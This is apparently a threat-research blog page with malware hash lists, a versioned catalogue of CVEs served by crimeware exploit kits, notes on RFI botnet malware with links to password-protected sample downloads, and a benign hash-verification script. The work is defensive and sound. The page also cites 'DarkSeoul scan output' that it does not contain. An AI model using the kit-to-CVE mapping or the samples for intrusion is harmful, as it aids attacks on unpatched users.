* Vinsula:
CVE-2013-0640 – Further Investigation into an Adobe PDF Zero-day Malware Attack
* Kaspersky: The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor

MD5 and file name:
0CDF55626E56FFBF1B198BEB4F6ED559 report.pdf2
151ADD98EEC006F532C635EA3FC205CE action_plan.pdf_
2A42BF17393C3CAAA663A6D1DADE9C93 Mandiant.pdf_
3119ABBA449D16355CEB385FD778B525 mousikomi.pdf_
3668B018B4BB080D1875AEE346E3650A action_plan.pdf_
37A9C45B78F4DEE9DA8FD8019F66005A sample.pdf_
3F301758AA3D5D123A9DDBAD1890853B EUAG_report.pdf_
6945E1FBEF586468A6D4F0C4F184AF8B report.pdf_
7005E9EE9F673EDAD5130B3341BF5E5F 2013-Yilliq Noruz Bayram Merikisige Teklip.pdf_
701E3F3973E8A8A7FCEC5F8902ECBFD9 701E3F3973E8A8A7FCEC5F8902ECBFD9
88292D7181514FDA5390292D73DA28D4 ASEM_Seminar.pdf_
8E3B08A46502C5C4C45D3E47CEB38D5A cc08_v143.pdf_
9C572606A22A756A1FCC76924570E92A pdf.pdf_
A7C89D433F737B3FDC45B9FFBC947C4D A7C89D433F737B3FDC45B9FFBC947C4D
AD668992E15806812DD9A1514CFC065B arp.pdf_
AE52908370DCDF6C150B6E2AD3D8B11B AE52908370DCDF6C150B6E2AD3D8B11B
AF061F8C63CD1D4AD83DC2BF81F36AF8 readme.pdf_
C03BCB0CDE62B3F45B4D772AB635E2B0 The 2013 Armenian Economic Association.pdf_
D00E4AC94F1E4FF67E0E0DFCF900C1A8 ???.pdf_
EF90F2927421D61875751A7FE3C7A131 action_plan.pdf3
F3B9663A01A73C5ECA9D6B2A0519049E Visaform Turkey.pdf_

AN OVERVIEW OF EXPLOIT PACKS (UPDATE 19.1) APRIL 2013
April 27, 2013, 10:00 pm

The Exploit Pack Table has been updated and you can view it here: Exploit Pack Table Update 19.1 - View or Download from Google Apps

If you keep track of exploit packs and can/wish to contribute and be able to make changes, please contact me (see email in my profile). I want to thank L0NGC47, Fibon, Kafeine, Francois Paget, Eric Romang, and other researchers who sent information for their help.

Update April 28, 2013 - added CVE-2013-2423 (released April 17, 2013) to several packs.
Now the following packs serve the latest Java exploit (update your Java!):
1. Styx
2. Sweet Orange
3. Neutrino
4. Sakura
5. Whitehole
6. Cool
7. Safe Pack
8. Crime Boss
9. CritX

Other changes

Updated:
1. Whitehole
2. Redkit
3. Nuclear
4. Sakura
5. Cool Pack
6. Blackhole
7. Gong Da

Added:
1. KaiXin
2. Sibhost
3. Popads
4. Alpha Pack
5. Safe Pack
6. Serenity
7. SPL Pack

There are 5 tabs at the bottom of the sheet:
1. 2011-2013
2. References
3. 2011 and older
4. List of exploit kits
5. V. 16 with older credits

March 2013

The Exploit Pack Table, which has just been updated, has migrated to Google Apps - the link is below. The new format will allow easier viewing and access for those who volunteered their time to keep it up to date. In particular, I want to thank L0NGC47, Fibon, and Kafeine for their help. The sheet has the same 5 tabs listed above.

The updates include:
1. Neutrino - new
2. Cool Pack - update
3. Sweet Orange - update
4. SofosFO aka Stamp EK - new
5. Styx 2.0 - new
6. Impact - new
7. CritXPack - new
8. Gong Da - update
9. Redkit - update
10. Whitehole - new
11. Red Dot - new

The long overdue Exploit Pack Table Update 17 is finally here. It got a colorful facelift and has newer packs (Dec. 2011 - today) on a separate sheet for easier reading. Updates / new entries for the following 13 packs have been added (see exploit listing below):
1. Redkit
2. Neo Sploit
3. Cool Pack
4. Black hole 2.0
5. Black hole 1.2.5
6. Private no name
7. Nuclear 2.2 (update to 2.0 - actual v. # is unknown)
8. Nuclear 2.1 (update to 2.0 - actual v. # is unknown)
9. CrimeBoss
10. Grandsoft
11. Sweet Orange 1.1 (update to 1.0 - actual v. # is unknown)
12. Sweet Orange 1.0
13. Phoenix 3.1.15
14. NucSoft
15. Sakura 1.1 (update to 1.0 - actual v. # is unknown)
16.
AssocAID (unconfirmed)

The full table in xls format - Version 17 can be downloaded from here.

Exploit lists for the added/updated packs (pack, month first seen, CVEs, exploit count as given in the table):

AssocAID (unconfirmed), 09-'12: CVE-2011-3106, CVE-2012-1876, CVE-2012-1880, CVE-2012-3683, Unknown CVE (5)
Redkit, 08-'12: CVE-2010-0188, CVE-2012-0507, CVE-2012-4681 (3)
Neo Sploit, 09-'12: CVE-2012-1723, CVE-2012-4681 (2?)
Cool, 08-'12: CVE-2006-0003, CVE-2010-0188, CVE-2011-3402, CVE-2012-0507, CVE-2012-1723, CVE-2012-4681 (5)
Black hole 2.0, 09-'12: CVE-2006-0003, CVE-2010-0188, CVE-2012-0507, CVE-2012-1723, CVE-2012-4681, CVE-2012-4969 promised (5)
Black hole 1.2.5, 08-'12: CVE-2006-0003, CVE-2007-5659/CVE-2008-0655, CVE-2008-2992, CVE-2009-0927, CVE-2010-0188, CVE-2010-1885, CVE-2011-0559, CVE-2011-2110, CVE-2012-1723, CVE-2012-1889, CVE-2012-4681 (11)
Private no name, 09-'12: CVE-2010-0188, CVE-2012-1723, CVE-2012-4681 (3)
Nuclear 2.2 (update to 2.0 - actual v. # is unknown), 03-'12: CVE-2010-0188, CVE-2011-3544, CVE-2012-1723, CVE-2012-4681 (4)
Nuclear 2.1 (update to 2.0 - actual v. # is unknown), 03-'12: CVE-2010-0188, CVE-2011-3544, CVE-2012-1723 (3)
CrimeBoss, 09-'12: Java Signed Applet, CVE-2011-3544, CVE-2012-4681 (3)
Grandsoft, 09-'12: CVE-2010-0188, CVE-2011-3544 (2?)
Sweet Orange 1.1, 09-'12: CVE-2006-0003, CVE-2010-0188, CVE-2011-3544, CVE-2012-4681 (4?)
Sweet Orange 1.0, 05-'12: CVE-2006-0003, CVE-2010-0188, CVE-2011-3544 (3?)
Phoenix 3.1.15, 05-'12: CVE-2010-0842, CVE-2010-0248, CVE-2011-2110, CVE-2011-2140, CVE-2011-2371, CVE-2011-3544, CVE-2011-3659, Firefox social, CVE-2012-0500, CVE-2012-0507, CVE-2012-0779 (11)
NucSoft, 2012: CVE-2010-0188, CVE-2012-0507 (2)
Sakura 1.1, 08-'12: CVE-2006-0003, CVE-2010-0806, CVE-2010-0842, CVE-2011-3544, CVE-2012-4681 (5)

Version 16. April 2, 2012

Thanks to Kahu Security for the Wild Wild West graphic. The full table in xls format - Version 16 can be downloaded from here.

ADDIT
IONS AND CHANGES:

1. Blackhole Exploit Kit 1.2.3
Added:
  1. CVE-2011-0559 - Flash memory corruption via F-Secure
  2.
CVE-2012-0507 - Java Atomic via Krebs on Security
  3. CVE-2011-3544 - Java Rhino via Krebs on Security

2. Eleonore Exploit Kit 1.8.91 and above - via Kahu Security
Added:
  1. CVE-2012-0507 - Java Atomic - after 1.8.91 was released
  2. CVE-2011-3544 - Java Rhino
  3. CVE-2011-3521 - Java Upd.27; see Timo Hirvonen, Contagio, Kahu Security and Michael 'mihi' Schierl
  4. CVE-2011-2462 - Adobe PDF U3D
Also includes:
  "Flash pack" (presumably the same as before)
  "Quicktime" - CVE-2010-1818 ?

3. Incognito Exploit Pack v.2 and above
There are rumors that Incognito development stopped after v.2 in 2011 and it is a different pack now. If you know, please send links or files.
Added after v.2 was released:
  1. CVE-2012-0507 - Java Atomic
See the V.2 analysis via StopMalvertizing.

4. Phoenix Exploit Kit v3.1 - via Malware Don't Need Coffee
Added:
  1. CVE-2012-0507 - Java Atomic
  2. CVE-2011-3544 - Java Rhino + Java TC (in one file)

5. Nuclear Pack v.2 - via TrustWave Spiderlabs
  1. CVE-2011-3544 - Oracle Java Rhino
  2. CVE-2010-0840 - JRE Trusted Method Chaining
  3. CVE-2010-0188 - Acrobat Reader LibTIFF
  4. CVE-2006-0003 - MDAC

6. Sakura Exploit Pack > v.1 - via DaMaGeLaB
  1. CVE-2011-3544 - Java Rhino (it was already in Exploit Pack Table v15; listed here to show all packs with this exploit)

7. Chinese Zhi Zhu Pack - via Kahu Security and Francois Paget (McAfee)
  1. CVE-2012-0003 - WMP MIDI
  2. CVE-2011-1255 - IE Time Element Memory Corruption
  3. CVE-2011-2140 - Flash 10.3.183.x
  4. CVE-2011-2110 - Flash 10.3.181.x
  5. CVE-2010-0806 - IEPeers

8. Gong Da Pack - via Kahu Security
  1. CVE-2011-2140 - Flash 10.3.183.x
  2. CVE-2012-0003 - WMP MIDI
  3. CVE-2011-3544 - Java Rhino

9. Dragon Pack - via DaMaGeLab, December 2010 - it is old, listed for curiosity's sake
  1. CVE-2010-0886 - Java SMB
  2. CVE-2010-0840 - JRE Trusted Method Chaining
  3. CVE-2008-2463 - Snapshot
  4. CVE-2010-0806 - IEPeers
  5.
CVE-2007-5659/CVE-2008-0655 - Collab.collectEmailInfo
  6. CVE-2008-2992 - util.printf
  7. CVE-2009-0927 - getIcon
  8. CVE-2009-4324 - newPlayer

Version 15. January 28, 2012

Additions - with many thanks to Kahu Security

Hierarchy Exploit Pack
=================
CVE-2006-0003
CVE-2009-0927
CVE-2010-0094
CVE-2010-0188
CVE-2010-0806
CVE-2010-0840
CVE-2010-1297
CVE-2010-1885
CVE-2011-0611
JavaSignedApplet

Siberia Private
==========
CVE-2005-0055
CVE-2006-0003
CVE-2007-5659
CVE-2008-2463
CVE-2008-2992
CVE-2009-0075
CVE-2009-0927
CVE-2009-3867
CVE-2009-4324
CVE-2010-0806

Techno XPack
===========
CVE-2008-2992
CVE-2010-0188
CVE-2010-0842
CVE-2010-1297
CVE-2010-2884
CVE-2010-3552
CVE-2010-3654
JavaSignedApplet

"Yang Pack"
=========
CVE-2010-0806
CVE-2011-2110
CVE-2011-2140
CVE-2011-354

Version 14. January 19, 2012

Version 14 Exploit Pack table additions:

Credits for the excellent Wild Wild West (October 2011 edition) go to kahusecurity.com. With many thanks to XyliBox (Xylitol - Steven), Malware Intelligence blog, and xakepy.cc for the information:

1. Blackhole 1.2.1 (Java Rhino added, weaker Java exploits removed)
2. Blackhole 1.2.1 (Java Skyline added)
3. Sakura Exploit Pack 1.0 (new kid on the block, private pack)
4. Phoenix 2.8 mini (condensed version of 2.7)
5. Fragus Black (weak Spanish twist on the original, black colored admin panel, a few old exploits added)

If you find any errors or CVE information for packs not featured, please send it to my email (in my profile above, thank you very much).

The full table in xls format - Version 14 can be downloaded from here.
The exploit pack table in XLSX format
The exploit pack table in csv format
The references sheet in csv format

P.S.
There are always corrections and additions thanks to your feedback after the document release; come back in a day or two to check in case v.15 is out.

Version 13. Aug 20, 2011

Kahu Security issued an updated version of their Wild Wild West graphic that will help you learn who is who in the world of exploit packs. You can view the full version of their post in the link above.

Version 13 exploit pack table additions:
1. Bleeding Life 3.0
2. Merry Christmas Pack (many thanks to kahusecurity.com)
3. Best Pack (many thanks to kahusecurity.com)
4. Sava Pack (many thanks to kahusecurity.com)
5. LinuQ
6. Eleonore 1.6.5
7. Zero Pack
8. Salo Pack (incomplete, but it is also old)

List of packs in the table in alphabetical order:
1. Best Pack
2. Blackhole Exploit 1.0
3. Blackhole Exploit 1.1
4. Bleeding Life 2.0
5. Bleeding Life 3.0
6. Bomba
7. CRIMEPACK 2.2.1
8. CRIMEPACK 2.2.8
9. CRIMEPACK 3.0
10. CRIMEPACK 3.1.3
11. Dloader
12. EL Fiiesta
13. Eleonore 1.3.2
14. Eleonore 1.4.1
15. Eleonore 1.4.4 Moded
16. Eleonore 1.6.3a
17. Eleonore 1.6.4
18. Eleonore 1.6.5
19. Fragus 1
20. Icepack
21. Impassioned Framework 1.0
22. Incognito
23. iPack
24. JustExploit
25. Katrin
26. Merry Christmas Pack
27. Liberty 1.0.7
28. Liberty 2.1.0*
29. LinuQ pack
30. Lupit
31. Mpack
32. Mushroom/unknown
33. Open Source Exploit (Metapack)
34. Papka
35. Phoenix 2.0
36. Phoenix 2.1
37. Phoenix 2.2
38. Phoenix 2.3
39. Phoenix 2.4
40. Phoenix 2.5
41. Phoenix 2.7
42. Robopak
43. Salo pack
44. Sava Pack
45. SEO Sploit pack
46. Siberia
47. T-Iframer
48. Unique Pack Sploit 2.1
49. Webattack
50. Yes Exploit 3.0RC
51. Zero Pack
52. Zombie Infection kit
53. Zopack

----------------------------------------------

Bleeding Life 3.0 - the new version ad is here

Merry Christmas Pack - read the analysis at kahusecurity.com

Best Pack - read the analysis at kahusecurity.com
Sava Pack - read the analysis at kahusecurity.com

Eleonore 1.6.5
[+] CVE-2011-0611
[+] CVE-2011-0559
[+] CVE-2010-4452
[-] CVE-2010-0886

Salo Pack - old (2009), added just for the collection

Zero Pack - 62 exploits from various packs (mostly Open Source pack)

LinuQ pack
Designed to compromise Linux servers using vulnerable phpMyAdmin. It comes with a DDoS bot, but any kind of code can be loaded for Linux botnet creation. LinuQ pack is a phpMyAdmin exploit pack with 4 PMA exploits based on a previous Russian version of the Romanian PMA scanner ZmEu. It is not considered to be original, unique, new, or anything special; all the exploits are public and well known. It is designed to be installed on an IRC server (like UnrealIRCd). IP ranges already listed in bios.txt can be scanned, vulnerable IPs and the specific PMA vulnerabilities are written to vuln.txt, and then the corresponding exploits can be launched against the vulnerable server. It is more a bot using PMA vulnerabilities than an exploit pack. It is using:
CVE-2009-1148 (unconfirmed)
CVE-2009-1149 (unconfirmed)
CVE-2009-1150 (unconfirmed)
CVE-2009-1151 (confirmed)

====================================================================

Version 12. May 26, 2011

Additional changes (many thanks to kahusecurity.com): Bomba, Papka. See the list of packs covered in the list below. The full table in xls format - Version 12 can be downloaded from here. I want to thank everyone who sent packs and information :)

Version 11. May 26, 2011

Changes:
1. Phoenix 2.7
2. "Dloader" (well, dloader is a loader, but the pack is some unnamed pack: http://damagelab.org/lofiversion/index.php?t=20852)
3. Nuclear pack
4. Katrin
5. Robopak
6. Blackhole exploit kit 1.1.0
7.
Mushroom/unknown
8. Open Source Exploit kit

====================================================================

10. May 8, 2011 - Version 10 - Exploit Pack Table_V10May11

First, I want to thank everyone who sent and posted comments for updates and corrections.

*** The Wild Wild West picture is from a great post about the evolution of exploit packs by Kahu Security: Wild Wild West Update. As usual, send your corrections and update lists.

Changes:
* Eleonore 1.6.4
* Eleonore 1.6.3a
* Incognito
* Blackhole

Go1Pack (not included) was reported as being a fake pack; here is a GUI. Here is a Threatpost article referencing it as it was used for an attack. Also, here is another article claiming it is not a fake: http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx
Go1 Pack CVEs are reportedly CVE-2006-0003, CVE-2009-0927, CVE-2010-1423, CVE-2010-1885. Does anyone have this pack or see it offered for sale?

Exploit kits I am planning to analyze and add (and/or find CVE listings for) are:
* Open Source Exploit Kit
* SALO
* K0de

Legend:
Black color entries by Francois Paget
Red color entries by Gunther
Blue color entries by Mila

Also, here is a great presentation by Ratsoul (Donato Ferrante) about Java exploits: http://www.inreverse.net/?p=1687

--------------------------------------------------------

9. April 5, 2011 - Version 9 - ExploitPackTable_V9Apr11

It actually needs another update, but I am posting it now and will issue version 10 as soon as I can.

Changes:
* Phoenix 2.5
* IFramer
* Tornado
* Bleeding life

Many thanks to Gunther for his contributions. If you wish to add some, please send your info together with the reference links. Also please feel free to send corrections if you notice any mistakes.

8.
Update 8. Oct 22, 2010 - Version 8 - ExploitPackTable_V8Oct22-10

Changes:
1. Eleonore 1.4.4 Moded added (thanks to malwareint.blogspot.com)
2. Correction on CVE-2010-0746 in Phoenix 2.2 and 2.3. It is a mistake and the correct CVE is CVE-2010-0886 (thanks to ♫ etonshell for noticing)
3. SEO Sploit pack added (thanks to whsbehind.blogspot.com, evilcodecave.blogspot.com and blog.ahnlab.com)

7. Update 7. Oct 18, 2010 - Version 7 - ExploitPackTable_V7Oct18-10 released

Thanks to SecNiche we have updates for Phoenix 2.4 :) We also added shorthand/slang/abbreviated names for exploits for easy matching of exploit names to CVEs in the future. Please send us more information about packs and exploit names that can be added to the list. Thank you!

6. Update 6. Sept 27, 2010 - Version 6 - ExploitPackTable_V6Sept26-10 released

Thanks to Francois Paget (McAfee) we have updates for Phoenix 2.2 and Phoenix 2.3.

5. Update 5. Sept 27, 2010 - Version 5 - ExploitPackTable_V5Sept26-10 released

Added updates for Phoenix 2.1 and Crimepack 3.1.3.

4. Update 4. July 23, 2010 - Version 4 - ExploitPackTable_V4Ju23-10 released

Added a new Russian exploit kit called Zombie Infection Kit to the table. Read more at malwareview.com.

Update 3. July 7, 2010

Please read more about this on Brian Krebs' blog: Pirate Bay Hack Exposes User Booty

Update 2. June 27, 2010

Sorry, but Impassioned Framework is back where it belongs - blue.

Update 1. June 24, 2010

The Eleonore 1.4.1 column was updated to include the correct list of the current exploits.

Francois Paget (www.avertlabs.com) kindly agreed to allow us to make additions to his Overview of Exploit Packs table published on Avertlabs (McAfee Blog). Many thanks to Gunther from ARTeam for his help with the update.
There are a few blanks and question marks; please do not hesitate to email me if you know the answer or if you see any errors. Please click on the image below to expand it (it is a partial screenshot).

Impassioned Framework is tentatively marked a different color because the author claims it is a security audit tool, not an exploit pack. However, no sufficient information has been provided yet to validate such claims, so the pack is temporarily/tentatively marked a different color. We'll keep you posted.

DEEPEND RESEARCH - LIBRARY OF MALWARE TRAFFIC PATTERNS
May 6, 2013, 3:17 am

Update May 6, 2013: We added the ability to download corresponding samples and pcaps (when available).

Traffic analysis has been the primary method of malware identification, and the thousands of IDS signatures developed are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns and see the trends when they change has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as a "personal notes" spreadsheet with GET and POST requests for different malware families, with information from open sources. We decided others might find it useful too.

>> read more on DeepEnd Research

DEEPEND RESEARCH: UNDER THIS ROCK... VULNERABLE WORDPRESS/JOOMLA SITES... OVERVIEW OF THE RFI BOTNET MALWARE ARSENAL
May 31, 2013, 10:19 pm
Exploits directed at Wordpress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved. One such infection scheme is essentially the following:

A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3, VirusTotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) - 7958f73daf4b84e3b00e008258ea2e7a, VirusTotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08, VirusTotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them is a PHP spambot (victimized site owners often get alerted about copious amounts of meds and porn spam emanating from their sites). This is also the source of the varied links used in spam: thousands of different links redirecting to the same sites (e.g. weight-loss, work-at-home scams, or porn sites).

Read more at DeepEnd Research >>>

Download files (see below)
Download the malware files (Email me if you need the password)
Download the pcap files (Email me if you need the password)

Wordpress_PHP_1FFD37807740EBCB7DAD044ACF866100_up.php 1ffd37807740ebcb7dad044acf866100
Wordpress_PHP_5F0BB0851B3A2838C34CF21400F22A7E_copy.php 5f0bb0851b3a2838c34cf21400f22a7e
Wordpress_PHP_7CCDCC3FF09262CAFE5DC953C0552254_seek.cgi 7ccdcc3ff09262cafe5dc953c0552254
Wordpress_PHP_9B6D87C50B58104E204481C580E630F1_sm14e.php 9b6d87c50b58104e204481c580e630f1
Wordpress_PHP_35DBB397351622B86E421EE8ABA095DE_fu.php 35dbb397351622b86e421ee8aba095de
Wordpress_PHP_45B02538063124A0FECC0987410B1A65_ru.php 45b02538063124a0fecc0987410b1a65
Wordpress_PHP_821BB092136A73EAA2CA803E6DBB658A_del.php 821bb092136a73eaa2ca803e6dbb658a
Wordpress-Mutopy_20A6EBF61243B760DD65F897236B6AD3.exe_ 20a6ebf61243b760dd65f897236b6ad3
Wordpress_DroppedbyMutopy_93F2D4ED74F7CCBF8E41F4D9D0B3BF98_Twain002.Mtx_ 93f2d4ed74f7ccbf8e41f4d9d0b3bf98
Wordpress_SDbot_AAEE52BFB589F6534C4B51E3B144DC08_svchost.exe_ aaee52bfb589f6534c4b51e3b144dc08
Worpress_Symmi_7958F73DAF4B84E3B00E008258EA2E7A_conhost.exe_ 7958f73daf4b84e3b00e008258ea2e7a
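Every sample pack on this page comes with a hash listing in the same shape as the one above (archive member name, then MD5, or MD5 then name in the CVE-2013-0640 listing). Before a downloaded set goes anywhere near a signature-testing rig it is worth confirming that what was extracted is exactly what was posted: nothing missing, nothing renamed out of recognition, and no stray file that is not on the list. The following is an added example written for this page, not the blog's own tooling; the listing it parses and the files it checks are constructed for the demonstration (the MD5 of b'hello' and of an empty file), not real samples.

```python
"""Check a downloaded sample set against a posted 'name md5' listing like the
ones on this page. Added example, not the blog's own tooling; the listing and
files it runs on are constructed for the demonstration (md5 of b'hello' and
of an empty file), not real samples."""
import hashlib
import os
import re
import tempfile

# A 32-hex token standing alone; hashes embedded in file names (e.g.
# Wordpress_PHP_1FFD..._up.php) are glued to underscores and do not match.
TOKEN = re.compile(r"(?<!\S)([0-9a-fA-F]{32})(?!\S)")


def parse_listing(text):
    """Map lower-case MD5 -> posted name. Accepts 'name md5' and 'md5 name'
    lines; lines without a standalone hash (headings, notes) are skipped."""
    expected = {}
    for line in text.splitlines():
        m = TOKEN.search(line)
        if not m:
            continue
        name = (line[:m.start()] + line[m.end():]).strip() or m.group(1)
        expected[m.group(1).lower()] = name
    return expected


def md5_file(path, chunk=1 << 16):
    """Stream the file so large archives are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_directory(directory, expected):
    """Return (matched, missing, unexpected). Matching is by hash, so a renamed
    sample still counts; a file whose hash is not in the listing is reported
    separately and deserves a look before it goes anywhere near a test rig."""
    found = {}
    for root, _dirs, files in os.walk(directory):
        for fn in files:
            path = os.path.join(root, fn)
            found.setdefault(md5_file(path), []).append(path)
    matched = {h: n for h, n in expected.items() if h in found}
    missing = {h: n for h, n in expected.items() if h not in found}
    unexpected = {h: paths for h, paths in found.items() if h not in expected}
    return matched, missing, unexpected


# Constructed listing in the page's 'name md5' style (not real samples).
SAMPLE_LISTING = """Download the files (Email me if you need the password)
Wordpress_PHP_5D41402ABC4B2A76B9719D911017C592_a.php 5d41402abc4b2a76b9719d911017c592
d41d8cd98f00b204e9800998ecf8427e empty.bin
"""


def build_demo_set():
    """Temp dir with one listed file (renamed) and one stray file; returns path."""
    d = tempfile.mkdtemp(prefix="samples_")
    with open(os.path.join(d, "renamed_a.php"), "wb") as f:
        f.write(b"hello")                 # md5 5d41402abc4b2a76b9719d911017c592
    with open(os.path.join(d, "stray.bin"), "wb") as f:
        f.write(b"not in the listing")
    return d


def run_demo():
    """Parse the constructed listing and verify the constructed directory."""
    return verify_directory(build_demo_set(), parse_listing(SAMPLE_LISTING))


if __name__ == "__main__":
    matched, missing, unexpected = run_demo()
    print("matched:   ", matched)
    print("missing:   ", missing)
    print("unexpected:", unexpected)
```

MD5 is used only because that is what the listings give; it is fine for confirming you received the posted bytes, but for a corpus you maintain yourself record SHA256 alongside it, as the DarkSeoul scan output above does, so that two different files can never share an identifier.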